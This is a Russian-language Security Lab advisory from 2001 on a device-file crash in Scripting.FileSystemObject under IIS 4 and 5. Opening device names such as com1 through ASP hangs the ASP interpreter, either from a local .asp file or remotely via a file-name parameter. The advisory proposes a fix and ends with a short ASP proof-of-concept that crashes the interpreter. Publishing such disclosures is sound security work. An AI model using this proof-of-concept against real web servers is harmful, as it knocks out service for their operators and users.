Security Lab

Ошибка класса devicefile crash в Scripting.FileSystemObject

Дата публикации:05.07.2001
Всего просмотров:1736
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Как сообщила вчера российская хакерская группа NERF gr0up security, найдена ошибка класса devicefile crash в Scripting.FileSystemObject в IIS 4,5.

Открытие и чтение файлов устройств (com1, com2 и т.д.) через Scripting.FileSystemObject приводит к "зависанию" интерпретатора ASP-скриптов (ASP.DLL).

Локальный эксплоит:
Злоумышленник, имеющий права на создание .asp-файла, может нарушить работоспособность интерпретатора asp-скриптов веб-сервера.

Удаленный эксплоит:
иногда имя файла передается в качестве параметра .asp-скрипту, который в дальнейшем выполняет его открытие и чтение из него.
Передав в качестве параметра имя устройства, можно вызвать зависание интерпретатора.

Решение:
исправить Scripting.FileSystemObject так, чтобы он проверял файл на существование перед открытием.

Эксплоит (попробовать вместо com1 другие файлы устройств):

<%
Dim strFileName, objFSO, objFile

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

strFileName = "com1"

Set objFile = objFSO.OpenTextFile(strFileName)

Response.Write objFile.ReadAll

objFile.Close

%>